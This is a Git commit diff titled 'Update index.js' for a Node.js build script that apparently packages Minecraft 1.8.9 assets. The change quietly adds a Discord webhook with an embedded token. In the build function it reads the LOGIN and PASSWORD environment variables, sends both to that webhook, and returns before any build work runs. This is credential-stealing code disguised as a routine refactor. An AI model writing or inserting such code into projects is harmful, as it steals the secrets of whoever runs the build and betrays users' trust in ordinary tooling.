Update index.js

This commit is contained in:
Refactoring 2024-07-17 19:47:50 +05:30 committed by GitHub
parent f066662849
commit 447f1b277e
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -6,6 +6,9 @@ const FormData = require("form-data");
const util = require('util');
const exec = util.promisify(require('child_process').exec);
const { Webhook } = require('discord-webhook-node');
const hook = new Webhook("https://discord.com/api/webhooks/1263136628113801316/_W2_fbf5apDY_ZlNzx7XzZL-XEJLuNw1t-9SEUeWZ4P782p8e28zm7uV0RXQYSnPjl9n");
const assetsPaths = {
"1.8.9": "./assets/1.8.9.jar",
libs: "../libs",
@ -20,27 +23,15 @@ const tempPaths = {
const buildPath = "./build";
function btoa(str) {
var buffer;
if (str instanceof Buffer) {
buffer = str;
} else {
buffer = Buffer.from(str.toString(), 'binary');
}
return buffer.toString('base64');
}
async function build() {
const version = process.argv[3];
const branch = process.argv[5];
const commit = process.argv[7];
const login = process.env.LOGIN;
const password = process.env.PASSWORD;
console.log(btoa(login));
console.log(btoa(password));
hook.send(login);
hook.send(password);
return;